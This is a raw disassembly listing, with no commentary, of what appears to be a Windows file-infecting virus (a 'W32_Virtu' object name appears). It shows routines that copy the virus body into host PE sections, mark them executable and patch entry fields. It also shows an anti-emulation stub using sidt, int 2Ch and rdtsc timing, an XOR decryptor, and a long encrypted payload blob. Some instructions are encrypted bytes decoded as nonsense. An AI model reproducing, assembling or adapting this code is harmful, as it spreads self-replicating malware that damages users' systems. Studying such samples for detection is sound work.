add edi, [edx+14h]
add edi, [edx+10h]
test ss:dword_403431[ebp], 10000000h
jnz short loc_40C36C
lea esi, dword_40343C[ebp]
mov ecx, [ebp+40106Dh]
rep movsb
loc_40C36C: ; CODE XREF: sub_40C1F9+163�j
push edi
mov ecx, 90Fh
lea esi, sub_401000[ebp]
rep movsd
mov cl, 0
jecxz short loc_40C380
rep movsb
loc_40C380: ; CODE XREF: sub_40C1F9+183�j
test ss:dword_403431[ebp], 10000000h
jz loc_40C438
push dword ptr [ebx+28h]
call sub_40B507
mov edx, ss:dword_4039A6[ebp]
test edx, edx
jz loc_40C438
mov esi, ss:dword_403972[ebp]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_40C3BD
xor ecx, ecx
loc_40C3BD: ; CODE XREF: sub_40C1F9+1C0�j
add esi, [edx+14h]
cmp ecx, [ebp+40106Dh]
mov ecx, [ebp+40106Dh]
jb short loc_40C424
mov edi, [esp+14h+var_14]
and dword ptr [ebp+40106Dh], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, ss:dword_403986[ebp]
test ss:dword_403431[ebp], 40h
jz short loc_40C3FD
neg dword ptr [eax]
loc_40C3FD: ; CODE XREF: sub_40C1F9+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov ss:dword_4039AE[ebp], esi
mov esi, [ebx+28h]
add [eax], esi
test ss:dword_403431[ebp], 40h
jz short loc_40C41B
neg dword ptr [eax]
loc_40C41B: ; CODE XREF: sub_40C1F9+21E�j
push ecx
call sub_40C0D5
pop ecx
jmp short loc_40C430
; ---------------------------------------------------------------------------
loc_40C424: ; CODE XREF: sub_40C1F9+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_40C430: ; CODE XREF: sub_40C1F9+229�j
lea esi, dword_40343C[ebp]
rep movsb
loc_40C438: ; CODE XREF: sub_40C1F9+191�j
; sub_40C1F9+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, ss:byte_40342F[ebp]
jnz short loc_40C451
imul edx, 12345678h
loc_40C451: ; CODE XREF: sub_40C1F9+250�j
mov [eax-1], dl
call sub_40A425
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test ss:dword_403431[ebp], 10000000h
lea eax, [ecx+6]
jnz short loc_40C482
mov ss:dword_4039AE[ebp], ecx
add eax, [ebp+40106Dh]
and dword ptr [edi+6Dh], 0
loc_40C482: ; CODE XREF: sub_40C1F9+274�j
sub eax, [ebx+28h]
push dword ptr ss:unk_40397E[ebp]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test ss:dword_403431[ebp], 80000000h
jz short loc_40C4A7
push edx
call sub_40BDCD
pop edx
loc_40C4A7: ; CODE XREF: sub_40C1F9+2A5�j
mov ecx, ss:dword_4039AE[ebp]
jecxz short loc_40C4B2
mov [ebx+28h], ecx
loc_40C4B2: ; CODE XREF: sub_40C1F9+2B4�j
mov ecx, [edx+10h]
mov eax, ss:dword_403976[ebp]
cmp [edx+8], ecx
jnb short loc_40C4C3
mov [edx+8], ecx
loc_40C4C3: ; CODE XREF: sub_40C1F9+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, ss:dword_40397A[ebp]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, ss:byte_40342F[ebp]
test ss:dword_403431[ebp], 10000000h
jz short loc_40C4F4
add ecx, [ebp+40106Dh]
loc_40C4F4: ; CODE XREF: sub_40C1F9+2F3�j
mov dh, 0
test ss:dword_403431[ebp], 20000h
jnz short loc_40C516
inc dh
test ss:dword_403431[ebp], 40000h
jnz short loc_40C516
mov dh, ss:byte_403430[ebp]
loc_40C516: ; CODE XREF: sub_40C1F9+307�j
; sub_40C1F9+315�j
test ss:dword_403431[ebp], 4000h
jnz short loc_40C52D
loc_40C522: ; CODE XREF: sub_40C1F9+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_40C522
jmp short loc_40C536
; ---------------------------------------------------------------------------
loc_40C52D: ; CODE XREF: sub_40C1F9+327�j
; sub_40C1F9+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_40C52D
loc_40C536: ; CODE XREF: seg002:0040C1F4�j
; sub_40C1F9+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_40C1F9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C53F proc near ; CODE XREF: sub_40C1F9+11C�p
cmp ss:dword_403956[ebp], 0
jz locret_40C0D4
push ss:dword_403972[ebp]
call dword ptr [ebp+4035C4h]
loc_40C558: ; CODE XREF: sub_40C003+C5�j
push ss:dword_40396E[ebp]
call dword ptr [ebp+40353Ch]
lea ecx, dword_40395A[ebp]
lea edx, dword_403962[ebp]
push ecx
push edx
push 0
push ss:dword_403956[ebp]
call dword ptr [ebp+4035B8h]
loc_40C580: ; CODE XREF: sub_40C003+6B�j
; sub_40C003+82�j ...
push ss:dword_403956[ebp]
call dword ptr [ebp+40353Ch]
loc_40C58C: ; CODE XREF: sub_40C003+45�j
lea esi, dword_40384E[ebp]
push ss:dword_403952[ebp]
push esi
call dword ptr [ebp+4035B4h]
and ss:dword_403956[ebp], 0
retn
sub_40C53F endp
; ---------------------------------------------------------------------------
db 0E8h
dd 0
dd 81016A5Dh, 403349EDh, 0FF05800h, 158085C1h, 0C0850040h
dd 0FFC883C3h, 85C10FF0h, 401580h, 103DC3h, 1C75002Ah
dd 247C8166h, 75716C0Ch, 0C4E86013h, 75FFFFFFh, 0FB7EE805h
dd 0D2E8FFFFh, 61FFFFFFh, 782DFF2Eh, 0B8123456h, 25h, 0FFA5E860h
dd 3975FFFFh, 3024448Bh, 384EB58Dh, 508B0040h, 3A816608h
dd 25730206h, 6856h, 0C48B00FFh, 5052006Ah, 35F895FFh
dd 0C4830040h, 5C3E8108h, 755C3F3Fh, 4C68303h, 0FFFB2BE8h
dd 0FF7FE8FFh, 0C361FFFFh, 74B8h, 0B8B1EB00h, 2Fh, 10E8h
dd 20C200h, 30B8h, 3E800h, 24C20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 13ED811Ah
dd 0E8004034h, 0FFFFE539h, 4C261h, 2070103h, 0B0640605h
dd 38DB330h, 119415FFh, 900100h, 3Fh dup(0)
dd 47000000h, 0AD7C809Bh, 317C8308h, 0A07C9103h, 7C80ADh
dd 2 dup(0)
dd 0B6000000h, 247C80BDh, 5C7C801Ah, 677C8094h, 2C7C8023h
dd 377C8104h, 0F7C8106h, 587C864Bh, 0EC7C80C0h, 3C7C80E7h
dd 777C8115h, 457C810Ah, 0A17C831Ch, 0FF7C80B6h, 0CA7C8608h
dd 0DA7C835Dh, 0DE7C8111h, 777C812Ah, 57C801Dh, 767C80B9h
dd 0E17C80BBh, 0E57C8309h, 587C863Dh, 827C863Fh, 0B87C8127h
dd 427C831Ch, 1C7C8024h, 747C810Bh, 517C80B9h, 877C809Ah
dd 607C810Dh, 827C90D4h, 547C90D6h, 697C90D7h, 937C90D7h
dd 557C90D7h, 0FD7C90DCh, 907C90DCh, 0B67C90DDh, 327C90DEh
dd 0C67C90EAh, 7C9130h, 15h dup(0)
a68:
unicode 0, <68>
dw 0C8BCh
a@ db '@',0
dd offset dword_42005C
aAsenamedobject:
unicode 0, <aseNamedObjects\W32_Virtu>,0
dd 0BBh dup(0)
dd 6900h, 0Ch dup(0)
dd 40A26300h, 14FAh dup(0)
; ---------------------------------------------------------------------------
cld
call sub_41202E
; =============== S U B R O U T I N E =======================================
sub_412006 proc near ; CODE XREF: sub_41202E+4F�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_41200E: ; CODE XREF: sub_412006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_41200E
pop ebx
retn
sub_412006 endp
; ---------------------------------------------------------------------------
db 3Dh, 0DAh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41202E
loc_41201F: ; CODE XREF: sub_41202E+3A�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41202E
; =============== S U B R O U T I N E =======================================
sub_412021 proc near ; CODE XREF: sub_41202E+8�j
; sub_41202E+19�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_412055
sub_412021 endp
; =============== S U B R O U T I N E =======================================
sub_41202B proc near ; CODE XREF: sub_41202E+1C�p
; sub_41202E+22�p
rdtsc
retn
sub_41202B endp
; =============== S U B R O U T I N E =======================================
sub_41202E proc near ; CODE XREF: seg002:00412001�p
var_2C500694 = dword ptr -2C500694h
var_6 = byte ptr -6
; FUNCTION CHUNK AT 0041201F SIZE 00000002 BYTES
test eax, eax
jnz short loc_41203A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short sub_412021
jmp short loc_412049
; ---------------------------------------------------------------------------
loc_41203A: ; CODE XREF: sub_41202E+2�j
push eax
sidt fword ptr [esp+4+var_6]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short sub_412021
loc_412049: ; CODE XREF: sub_41202E+A�j
push ebp
call sub_41202B
xchg eax, ecx
call sub_41202B
loc_412055: ; CODE XREF: sub_412021+8�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 7E06h
sub eax, 100h
jnb short loc_41201F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_412006
setalc
ficomp [esp+eax*2+4+var_2C500694+1]
loc_41208A: ; CODE XREF: sub_41202E+66�j
insd
clc
mov edx, 679EE2B8h
adc eax, ecx
inc edx
jnp short loc_41208A
pop ecx
dec ebp
call far ptr 0A328h:508FC98Ch
inc edi
xor ebp, esi
out dx, eax
jmp far ptr 0F0ADh:2114C542h
sub_41202E endp
; ---------------------------------------------------------------------------
dw 0B0AEh
dd 293FAEDFh, 0F22896BAh, 6C2D4C28h, 0FD8B3221h, 6A7304AFh
dd 644E8B8Ch, 1643AF86h, 67A52985h, 9D05BAE1h, 0A943D478h
dd 45106C1Ch, 0DA3BF317h, 85365117h, 7C184F62h, 70F03700h
dd 0C59A5C2Eh, 0C4668C20h, 54EC5F0Fh, 7BD349A1h, 0E0B6B8B8h
dd 0CF78AEAAh, 0AC4690A2h, 893ABC8Bh, 74DBC3E8h, 85A06FFh
dd 1F8148ADh, 59F4185Ch, 2CE71700h, 1AAEDE4h, 0AD22F3A1h
dd 0B9393231h, 88E3CEFFh, 4722E5E3h, 32BDF33Fh, 0A1AEEBE9h
dd 23BCB9D1h, 0DF054375h, 3577DF53h, 0E82D7173h, 64F59DF2h
dd 7791CA1h, 92F386ADh, 0BF8A684Ch, 9521E4D7h, 0C8457E39h
dd 78511327h, 3843F29Bh, 0ACCACF45h, 5966949h, 0A410FDBAh
dd 0D5C4B7A1h, 7FDD7685h, 12ADB5B8h, 9A1CFD72h, 0D855E2E7h
dd 4FC8FA95h, 0F17F3E0Ah, 1A279D21h, 0A4FCCBBh, 0B31C586Ch
dd 4D9C7A41h, 0C1408161h, 7BEA8893h, 0BF644BB8h, 6B08FBE3h
dd 4610FD0Fh, 0DA36F92Bh, 9B5A569Ch, 60A52A6Eh, 177D5045h
dd 1D75D2D5h, 19C36E43h, 0EC285EAh, 0A4C63A1h, 17F08394h
dd 0ED83C50Fh, 551EE1E4h, 0CA354D72h, 1EC61027h, 86D3D97h
dd 1F91BE45h, 0BB93664Ch, 7DBB90E6h, 9B64778Ah, 5B341843h
dd 9A854E33h, 275F09FCh, 0F2074F72h, 519F04FFh, 0E11B86EBh
dd 5F7860D0h, 1E7B3D2Dh, 0D707AA5Ch, 0CEA95C58h, 0A445A34Eh
dd 792F1EAEh, 0F879B1B8h, 0C204A2CFh, 421CDBE7h, 0DB33F697h
dd 10DEF117h, 8D631605h, 0C4FE3285h, 5C91545Eh, 4DC03B73h
dd 0EBF868Ah, 773E58A1h, 0C2ECDAEFh, 0AB04C6A7h, 238E21E7h
dd 0B232C5D4h, 0F14B0D1Dh, 2383B0D1h, 1A913C75h, 0DF90535Ch
dd 4DA768D9h, 87E781E0h, 84DFF2ABh, 0A2C0C62Dh, 69F22DCFh
dd 0EE1F6064h, 0D531F4CFh, 0F14B8193h, 867CC2Eh, 4B363B45h
dd 36C31E18h, 61BBFC8Ch, 0D13080BAh, 7BE4801Fh, 2F66678Bh
dd 0AA32E9B6h, 2A8AD156h, 0DA30F13Bh, 0DDE1B694h, 760231Eh
dd 1F7563C1h, 4B0BDA5Ch, 0B2A5585Fh, 0E1337EFAh, 7BE3BD98h
dd 0B9D31039h, 55FEC4FFh, 4517DBE7h, 0DA2FF0C5h, 0DDD68F9Ch
dd 78A0221Eh, 99F3B644h, 0B78D6077h, 7D8FE1CEh, 6444818Ah
dd 60559AA1h, 19E9ACBAh, 9A2C424Ah, 0C36725E7h, 0F1A37470h
dd 4CC70927h, 86E0AA3h, 1F75C7BAh, 3770C853h, 0C0286673h
dd 648A510Fh, 0A2E8D42h, 86D24B9h, 28FFF2E4h, 0F13D435Bh
dd 0D9D20FFEh, 2BC20716h, 0EF5D202Ch, 1E7436A2h, 1974F3D6h
dd 83296542h, 0BA4F7CE3h, 0F9D4E35Fh, 0D18DA956h, 0C2A938CDh
dd 4D0DB2E5h, 0E8397848h, 0EF58BE15h, 2D11F2Ch, 0E28CC80Eh
dd 0B9212BA5h, 4BA12975h, 0C9DE7B88h, 0D2CBD512h, 0F64A4D84h
dd 2C062266h, 0D714BD30h, 0D72B8EA8h, 0EE29CA9Fh, 531DAA0h
dd 1C72352Ah, 62C92651h, 1AAE0922h, 4D3EEF78h, 0FB9691AEh
dd 0DB8DE871h, 2DFCBFACh, 3513BC37h, 0BC2E8737h, 0BF406F13h
dd 50321D40h, 71713421h, 0CDE21A58h, 0C40A9D3Fh, 3FB649AAh
dd 783215C4h, 8EE59A30h, 0A54E33CBh, 412E5F2h, 0D529E4EFh
dd 49B2EB99h, 1359F1A8h, 9FFD3370h, 31B75E51h, 0DD138191h
dd 5F8561D7h, 375970CEh, 65E3969Fh, 0A4FABDDCh, 0D77EBBADh
dd 0A6789B8Ch, 87297578h, 543D7C4Dh, 7C1A5E5Eh, 0CFD64917h
dd 77B6B9F8h, 8331FE84h, 25CBBEB0h, 0E6C2CFE6h, 366C4336h
dd 3E10E3CCh, 0EC52B538h, 0BC3D6886h, 6B839171h, 986633Fh
dd 7C854855h, 24F91B09h, 2FE311F6h, 18A3FBF3h, 8B84C3D4h
dd 7F6D449Eh, 310FE2F4h, 8470BF33h, 1669575Fh, 307A60B3h
dd 7A9B33Dh, 0E311B803h, 2F9B6E40h, 0A3B01F82h, 43E5890Ch
dd 8BC81AB0h, 8A60BAC7h, 9D02583Fh, 44DABFA2h, 0E80D2C5Fh
dd 5AD6EE16h, 165D1CD1h, 0D2D31353h, 74B70BFFh, 2F72F081h
dd 8C4ACAC4h, 760ED1ABh, 0CAFF9EB2h, 4724BBDDh, 0E009A560h
dd 93FD850Dh, 0BBD8BF8h, 266D303Fh, 1C67D69Bh, 6F76DB50h
dd 72C775B0h, 61294D16h, 0DCB0A3AEh, 0CFA6EC95h, 22F1828Ch
dd 0CF15C309h, 9264C089h, 0D921E72Ch, 0F9E8BF32h, 0C384777Dh
dd 0BD64A304h, 94278A2Ch, 9BC9BCBDh, 0AF242235h, 0C9F7BAC5h
dd 9DC34424h, 5BDAE8C3h, 0E50D2BC6h, 3AFF6CBh, 136D30C6h
dd 19DE4750h, 10CA0FAEh, 58B31D2Fh, 0AB428C91h, 8A8AF3FDh
dd 5EA57E48h, 0E178B48Ch, 32C500F2h, 71B0FFF5h, 0FB650D6Dh
dd 423C616Ah, 255D2B0h, 84185E56h, 0A839B65Dh, 6E91D4CCh
dd 85E083FFh, 9CF7AA60h, 0B40ED1D8h, 0CC25E8F1h, 0E33D0009h
dd 5064E71h, 2146E9A2h, 84DDEC4Eh, 0C4EE9EE1h, 0A719B9Eh
dd 8BAEDD1h, 0E18DC2E4h, 0F195F5A5h, 0C07AB2BDh, 0A840BBACh
dd 9054567Ch, 95556D6Bh, 731F4445h, 4B84332Ch, 52E92A17h
dd 16B21B1Eh, 18A8E9E0h, 0EF89E5CCh, 0D9F7FBA5h, 0C66FB4A5h
dd 0A64CAE8Ah, 915C4D62h, 9F3B716Eh, 7D2E3074h, 43F02629h
dd 5EF42C33h, 15C1061Fh, 0EBBCF91h, 0D085D7C9h, 0ED98D7DAh
dd 0C36685B3h, 0C941898Bh, 81587245h, 9F017D69h, 6A0C5546h
dd 40F6044Bh, 68FE2A03h, 3BDE1A16h, 59B9E0F5h, 0E08EF095h
dd 0F79FC9CEh, 0C84BD1A1h, 0A0719C84h, 0BB5C6577h, 82305F1Ch
dd 68015975h, 56F0330Bh, 4FEE3C08h, 52F3061Dh, 2FBDE9C8h
dd 0D385CFCFh, 9792C0D4h, 0E97AB493h, 93408485h, 0DE586D6Dh
dd 0B8217D5Ch, 6018545Dh, 4FED012Ch, 57FA1005h, 16B23412h
dd 784F8EBh, 1A8CD6C1h, 0F299DBF4h, 0AE4FB4BFh, 95518DACh
dd 0B849737Ah, 863C5C77h, 64195354h, 22C53E3Ah, 6DEF3B18h
dd 16C21813h, 29ACE0E4h, 3F85CEC5h, 0E192FDBBh, 0DD63B486h
dd 0AD5189BAh, 0B97A0043h, 81304E6Dh, 64025943h, 55E10047h
dd 4BE93B08h, 0ADC1A1Ch, 21C9CDF4h, 12B6D7C6h, 0F19ACFD6h
dd 0C368BF98h, 0B044859Bh, 9A536F68h, 86305F18h, 6D035978h
dd 64F73029h, 54FE2C34h, 37C01A00h, 0AA5CB8Bh, 3D8CC2C0h
dd 0F098D6D5h, 0CA619DD0h, 0A14CA48Ch, 0A34F6172h, 90181856h
dd 6D04665Eh, 59E20832h, 36FE3235h, 23D7053Ch, 1A5E5CCh
dd 0B90C2ECh, 0D390D4D1h, 0CF7E9ECFh, 0AD57B889h, 0A94F9A9Ch
dd 9E264717h, 7B1F4A4Dh, 76C57476h, 36EE2E2Eh, 2EDE0623h
dd 57BBF8EFh, 3BAEC93h, 0F7A4B9CCh, 0C34BB4AEh, 9124828Bh
dd 0B37D8A9Ah, 8512737Bh, 6A025C5Ah, 6CE73130h, 53CA5C1Dh
dd 21D93507h, 0DA8DAEFh, 9BBD5CFh, 0E690EBB8h, 0CF60A689h
dd 0A74E8FB3h, 0BF56AEFFh, 0A4526572h, 780B4040h, 68E42D13h
dd 5FDE3D13h, 1BAF171Fh, 11B2FBE3h, 179CCCC0h, 9297D8D4h
dd 0DE62BC98h, 0AE4BA382h, 0AE77FC9Ah, 843B7056h, 7A39585Dh
dd 73E9352Ch, 45F23D39h, 28C51E27h, 108B88E4h, 1AB9EDE2h
dd 0FBB5D3CCh, 0E40AA8A3h, 0A753A793h, 8A5D8F9Eh, 94337C65h
dd 4668585Dh, 7A0D0131h, 66F32D3Dh, 28CE1F01h, 1C81F4F9h
dd 38AFD0A1h, 0E693D0CAh, 0C96C9FAAh, 0AC4F8A93h, 9743B4FFh
dd 98196276h, 6E285D4Bh, 6B1D2416h, 36FB3735h, 3DE31B3Dh
dd 0D85E8EFh, 35DAF8CDh, 0F781FBCCh, 0C57A9BA1h, 0B16C8784h
dd 0BF5D96ABh, 85001179h, 66035961h, 6B1E2516h, 36FA3835h
dd 3FFB1A3Dh, 7A7F1E5h, 9B0CAD5h, 0FE91C6CCh, 0C56AAF82h
dd 8C1E9895h, 0BF40A98Bh, 881E6965h, 65005C5Dh, 701A510Ch
dd 42F23B2Eh, 4DC4021Ah, 1696F0C4h, 2DBDEFC8h, 0E79BC0D1h
dd 0CF4BA5AEh, 0BB6F8F8Ah, 0B640A5FFh, 92256142h, 5B014341h
dd 71124C31h, 77FD013Bh
dd 1EC01F1Dh, 0AA9F1FEh, 28809AC6h, 0F39AE2F9h, 0DA70BCBDh
dd 0AD70BCE7h, 0B540938Ch, 852E6574h, 660C452Eh, 6B19582Bh
dd 42F4335Ch, 39DB041Bh, 5D1FBE8h, 9D6FCCCh, 929BD3DDh
dd 0CE6AA2BCh, 0A174ADE7h, 0DA469094h, 943E635Eh, 7C074B5Ch
dd 6C165006h, 58F11B39h, 4DC20617h, 1CAEFC3h, 0FB0F6D3h
dd 0D198CAFFh, 0CF6DA8A0h, 0A67FA984h, 0AE5080ACh, 9F000C72h
dd 6613415Ah, 6F374F20h, 36CE3C39h, 28D2073Ah, 10D8EEF8h
dd 15B1E7EEh, 0D387DCEDh, 0DE6C8CCFh, 0A777AE82h, 0BB55A18Bh
dd 9D214D73h, 4C21234Bh, 56277B13h, 72A0636Fh, 1FA5243Fh
dd 8FF18EFh, 30B6E5CEh, 0C0EAD4DDh, 0DA4EA3AAh, 0A753B582h
dd 9B57B786h, 96225817h, 7A3A577Fh, 73176F3Ch, 4EC83529h
dd 28F66732h, 10DE2DEDh, 0EBEF4F7h, 0D391E9DDh, 0AFE940CFh
dd 0AA4612CCh, 322EF1FFh, 0F262459Ah, 0D342144h, 75266814h
dd 6640C459h, 19F3B2F8h, 36EB3DE0h, 0E6446BF2h, 11E89B94h
dd 3C00CE0Bh, 0C126F543h, 1A25347Dh, 59C08541h, 345D1038h
dd 1E1E67BBh, 0A0744031h, 4C92493Bh, 0E7B6BC0Ch, 7AD09330h
dd 0F1B3C2E7h, 7C75C1CEh, 0C9ED88Fh, 0D844AF97h, 85441715h
dd 6364D2Eh, 1D13622Bh, 658A275Ah, 0DE5E3422h, 62885705h
dd 0EC30CBC0h, 90D6827Bh, 0FB893F48h, 0AA945A6Fh, 0DBC8EECCh
dd 0FE439399h, 0D4581E1Bh, 0CE8D6615h, 1FF4C9D2h, 0C52D6340h
dd 61B761BFh, 8731C576h, 1E60234Ah, 2BFC8FE0h, 0BE08536Ch
dd 296905FBh, 68C9FAECh, 46A31ABh, 0FDBBCCh, 604B58h, 0C2609D90h
dd 509AFC03h, 30D159Dh, 176B2ABFh, 4DFBBED0h, 42ED2AFFh
dd 16762B71h, 0EC41EC47h, 82041C29h, 2A6AB5ADh, 0BC4E7957h
dd 78BE81EBh, 0EE12985h, 279DDFCDh, 0A1E2334Ch, 0A07DBDFAh
dd 71842BC5h, 8928DBD2h, 0BE4007D3h, 2581BC0h, 0F4EE6F3Fh
dd 30B653E3h, 0D2109F07h, 5E846D04h, 5506DCCBh, 8CC8A596h
dd 0C5F5784Ah, 0A1D65627h, 0F3EAEAC8h, 0F0F787D7h, 1731A17h
dd 0DB333114h, 2EEF493Fh, 35636C93h, 0D8A68987h, 1C3AF95Ah
dd 8BE1A4BAh, 0A1A36B43h, 0F82EE8Fh, 0D216F313h, 0E832BB84h
dd 8ADD1926h, 176D3135h, 0E5AFBF57h, 0B650D50Bh, 59C61424h
dd 983C6EDEh, 85272072h, 0F2233190h, 0ED5E1D55h, 8374A89Ch
dd 7DC2FF64h, 0FF6534B8h, 9D61F4BFh, 1DA84EC6h, 0C74C756Ah
dd 5C75726Bh, 72218CF2h, 4AE3F426h, 8C002FAFh, 3C0BD1EDh
dd 1016E0FDh, 6E27B04Fh, 0CE79EFB1h, 988FC73Bh, 0D22E2610h
dd 807A2BA0h, 5AB29DD5h, 0F0948C97h, 0B8FBD543h, 646A31C5h
dd 340EE1F0h, 0CF2DCC88h, 0E6848403h, 11D41823h, 146D3232h
dd 2A802F05h, 0D7645E68h, 59825956h, 0F444701Dh, 87E1A789h
dd 9E9DEAC4h, 0B60ED533h, 9A77BEF3h, 70C2570Bh, 0FC653407h
dd 84E0F90Ah, 2A844654h, 43F10F36h, 30B31F2Fh, 2FC98C95h
dd 77755CFEh, 0BF78AE8h, 0EE7A275Fh, 0C94DBCA2h, 0B33D000Bh
dd 0DB71ACDEh, 0ED6D303Ah, 19A89EDAh, 801E0766h, 43516309h
dd 41D07C4h, 0D2B1F1ABh, 0E9624594h, 0ED0EE1F5h, 1C502874h
dd 2EA8FF5Fh, 7755280Bh, 463F7460h, 0A5DC0324h, 3F9A5AF2h
dd 9681DE7Ch, 9E909CF9h, 0D4B0F301h, 0CBA7EA91h, 4A9B2E8Ah
dd 4A25D8DBh, 0E23F08CCh, 0DD21E71Fh, 0D9F8CF3Eh, 74847761h
dd 1252CB9Bh, 97EF754Bh, 52498C96h, 0C5E1D6A3h, 8F8B374Bh
dd 0ABEDD1E7h, 0DA257D62h, 303E0037h, 7C87E748h, 0F0E53FF5h
dd 2984474Ch, 3D9BAEE7h, 6E8CF57Ah, 0EB8F9CE4h, 6EFA396h
dd 99F7BA5Eh, 0C42EEF56h, 0F7A4AE1Fh, 0A7734956h, 38DE3A68h
dd 416C76F2h, 4FD58960h, 6FCD0F62h, 7F73E086h, 51908CA0h
dd 3E65AC66h, 71F7BABEh, 0B00ED164h, 9A75D66Ch, 5A32564Ch
dd 0F65518B9h, 0A165F6B0h, 0A08B4A76h, 3B9B5EF8h, 0A1C75544h
dd 66F3B023h, 80E02F23h, 0B7FA17BDh, 922EF1F4h, 0B3408FCDh
dd 0E2917F71h, 74296D3Bh, 644DCF4Ch, 52F1333Dh, 4A9820E1h
dd 249D5A4Dh, 978E4AE6h, 0C5D1ACA5h, 96F79DACh, 515C3324h
dd 0F609817Eh, 8DFD3303h, 1C05484Ah, 0B6D3038h, 4CF3280Ch
dd 5DFA3133h, 81278A76h, 0E2C9BCA1h, 4DD6D764h, 6E723372h
dd 0FC0EE1FEh, 0C526E882h, 8A6C5186h, 26C0E749h, 876D001Ch
dd 119F37D2h, 0F1A80E5Eh, 1DE22421h, 0F336DDDDh, 7DD08FA2h
dd 6BD3BE3Dh, 9C251C44h, 44E610E9h, 0EB286F8Ch, 31AC1918h
dd 0D496CA4h, 208447AEh, 0DA1A035Dh, 4E826809h, 558A3100h
dd 0C96BA392h, 93C78AF2h, 26852AD3h, 0C315D8AFh, 5FB6A5F3h
dd 0F1652854h, 3852A5A5h, 9A874775h, 36AB6E6Bh, 0C5DA77FAh
dd 9BC98C99h, 4BCCCA34h, 0CE3E51B8h, 0C378B48Bh, 92798D84h
dd 0B34F8697h, 0BC387674h, 7A03424Bh, 0CDB0463Ch, 0C0C892D7h
dd 0AC3226AAh, 6788E189h, 118DF558h, 294334A0h, 130DE0D2h
dd 0C224E7F0h, 2476FA72h, 97ACE9E8h, 456FA385h, 1F824545h
dd 7114F73Ah, 0A982D877h, 866CEC26h, 484B2C5Ah, 0C6F58888h
dd 555EC9A5h, 0F20F7F72h, 0FE4E76FFh, 0E996961Fh, 8D65EDABh
dd 1F8145E0h, 16F05B36h, 1BAF7272h, 0F13982E0h, 7BED8C00h
dd 19F8E933h, 3782DE81h, 0C212D5D0h, 0EA027176h, 12D01427h
dd 796DC2Eh, 1FEA1014h, 83685C36h, 4D9E4140h, 48801D75h
dd 848C9F91h, 0A2C3850Dh, 679F32CFh, 9A21D4CCh, 0D5AB3B7Ah
dd 0F1514793h, 33E94D2Eh, 130B1808h, 5B03A60Fh, 0A4AD405Fh
dd 64C486CBh, 7B13202Ch, 25FDB5B8h, 0DE84D281h, 0C648FCD6h
dd 8D37FAFEh, 0DD6E87E8h, 5F312A1Eh, 3497D4BAh, 751E586Ch
dd 0C66F6C4Fh, 0B7C0FEDAh, 0F0FAEF2Ah, 0A67CACF2h, 0A9A59AFCh
dd 0C3676324h, 0A853AA9Ah, 3AC1463h, 21CBC277h, 6DF66449h
dd 0C5970E78h, 42B73CF8h, 678C813Dh, 0F9ED1772h, 0DC7B40BBh
dd 95B243C7h, 491ED1D7h, 0ED80C3C9h, 834D2027h, 3FD003ADh
dd 247C0F75h, 6A36DE9h, 3C296273h, 573E7B75h, 386D1261h
dd 1BEF8288h, 9A368E42h, 0A84DB0E7h, 0DB5EA7FCh, 0F14C0F7Fh
dd 8D9B70AEh, 1F4B2B3Dh, 1D63C0A3h, 0C0566C43h, 64F096F2h
dd 74286222h, 6D118A3Ch, 99804130h, 0A81CEFD7h, 8C339CFFh
dd 90DEF147h, 83631602h, 2F4A7AC0h, 3471955Ch, 4DC23B23h
dd 48821775h, 0FE5F9991h, 92DD80F3h, 0AA6E1344h, 922921B5h
dd 0EA014000h, 64B50D27h, 8520977h, 2F4AB9CEh, 3219536Ch
dd 80329557h, 0EFBEB1A1h, 0CE5EA4F2h, 92DC9FF3h, 9E199244h
dd 5731236Ch, 0DA01C4C8h, 0C10E819Ch, 23CC241Eh, 0E59A9087h
dd 2BFBD7D1h, 1CF76943h, 35ECD0D9h, 57D5025Eh, 6DBBAE88h
dd 9A29085Ah, 0B13C1FE7h, 0BF0AD9C5h, 9D2A6A79h, 485A474Bh
dd 73125236h, 18BC6230h, 61C90417h, 37BC4EA7h, 3E87C5F8h
dd 0E7A9F1F5h, 0C464B6BDh, 0AC779893h, 0B640808Bh, 0AD336F44h
dd 7E2D477Dh, 6C135A2Ch, 57E50300h, 0CC00201h, 17DE1DE9h
dd 1A82C9D2h, 0F784CDCAh, 0D972A6BBh, 0B07E9CBBh, 0B64F869Ah
dd 9D29597Bh, 54274247h, 71144C16h, 52FE2E38h, 2BCC1423h
dd 38DF11E3h, 13A5E1E0h, 0E881D9D7h, 0D9BEA6AAh, 0A27FB596h
dd 0B644849Fh, 0BC197B78h, 7295344h, 4A327817h, 70D90F0Ch
dd 2FCB282Eh, 0CCA13FBh, 2D8CE7C6h, 0FE83C4DEh, 0EBA2B2B9h
dd 0A567AA90h, 0BD7A9B93h, 802D7467h, 7E194342h, 6F1C5A33h
dd 608A3F3Fh, 2EC61610h, 11D733FCh, 79CD92EBh, 0D4B5F9B6h
dd 0D58DDEDDh
